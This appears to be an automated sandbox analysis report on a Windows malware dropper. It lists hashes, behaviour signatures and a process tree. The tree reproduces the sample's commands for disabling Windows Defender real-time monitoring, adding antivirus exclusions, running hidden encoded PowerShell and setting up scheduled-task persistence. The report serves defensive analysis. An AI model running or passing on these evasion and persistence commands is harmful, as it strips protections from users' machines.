Analysis

  • max time kernel
    88s
  • max time network
    91s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02/06/2024, 01:27

General

  • Target

    def9eaafe566d53c24300dac5c134cf3de6691d6bce5dd12fb667a410a48eb87.exe

  • Size

    7.3MB

  • MD5

    b74df74fc221ad83ef1c5da21b399a55

  • SHA1

    28ccda0ef73eba83f0e24da689d3d0681a62bfe6

  • SHA256

    def9eaafe566d53c24300dac5c134cf3de6691d6bce5dd12fb667a410a48eb87

  • SHA512

    c1234c5cda6332f3526462c87746a0b80ef78ad388f0f635bcc69b38c7254d9a51cb6ff22c7e552c6bb1562a89c991af817f3ad9bc0a1f94e1ba2224667f68a8

  • SSDEEP

    196608:91OpcF9aTaDrezU9vnRv0ls78rirymHGbfObhF:3OpcF9aTArEevnG27Gi+7bWL

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\def9eaafe566d53c24300dac5c134cf3de6691d6bce5dd12fb667a410a48eb87.exe
    "C:\Users\Admin\AppData\Local\Temp\def9eaafe566d53c24300dac5c134cf3de6691d6bce5dd12fb667a410a48eb87.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Users\Admin\AppData\Local\Temp\7zS1094.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Users\Admin\AppData\Local\Temp\7zS1268.tmp\Install.exe
        .\Install.exe /sDTYdidCw "385128" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2656
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2688
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2644
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2544
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2596
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2788
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2448
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                  PID:2948
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2716
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        7⤵
                          PID:2600
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      5⤵
                        PID:2704
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2708
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              7⤵
                                PID:2728
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            5⤵
                              PID:2744
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                  PID:2756
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2480
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      8⤵
                                        PID:2700
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                4⤵
                                  PID:2768
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                      PID:2616
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2856
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:380
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\ctSZAID.exe\" PP /IwkdidbVHR 385128 /S" /V1 /F
                                    4⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:1948
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
                                    4⤵
                                      PID:668
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                        5⤵
                                          PID:2208
                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                            6⤵
                                              PID:1564
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 496
                                          4⤵
                                          • Loads dropped DLL
                                          • Program crash
                                          PID:3060
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {8017BA66-22F7-4BFD-9921-06DCB8FAEC47} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:1448
                                      • C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\ctSZAID.exe
                                        C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\ctSZAID.exe PP /IwkdidbVHR 385128 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:2164
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                            PID:1404
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              4⤵
                                                PID:1524
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:1388
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      6⤵
                                                        PID:1296
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:1768
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:2284
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:2064
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:2256
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:2272
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:2088
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:2056
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:2112
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:2804
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                        PID:2532
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                            PID:2116
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              6⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1156
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                7⤵
                                                                                  PID:1256
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gRWOGSyNx" /SC once /ST 00:12:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1488
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gRWOGSyNx"
                                                                          3⤵
                                                                            PID:1472
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gRWOGSyNx"
                                                                            3⤵
                                                                              PID:960
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                              3⤵
                                                                                PID:708
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:2304
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                3⤵
                                                                                  PID:2820
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:564
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "gPLWAtwwH" /SC once /ST 00:50:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1796
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn "gPLWAtwwH"
                                                                                  3⤵
                                                                                    PID:988
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /DELETE /F /TN "gPLWAtwwH"
                                                                                    3⤵
                                                                                      PID:2672
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                      3⤵
                                                                                        PID:2756
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                          4⤵
                                                                                            PID:2696
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:312
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2956
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:1820
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:1952
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1020
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • Windows security bypass
                                                                                                PID:380
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2888
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:1696
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1032
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:2760
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\wWEQVCuC\AfIVookTbwqUaiGw.wsf"
                                                                                                      3⤵
                                                                                                        PID:2768
                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                        wscript "C:\Windows\Temp\QqEAMUespgTHJnVz\wWEQVCuC\AfIVookTbwqUaiGw.wsf"
                                                                                                        3⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1252
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1564
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2216
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1732
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2260
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1300
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2076
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2272
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:484
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2808
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1496
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1232
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:592
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1864
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1592
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1132
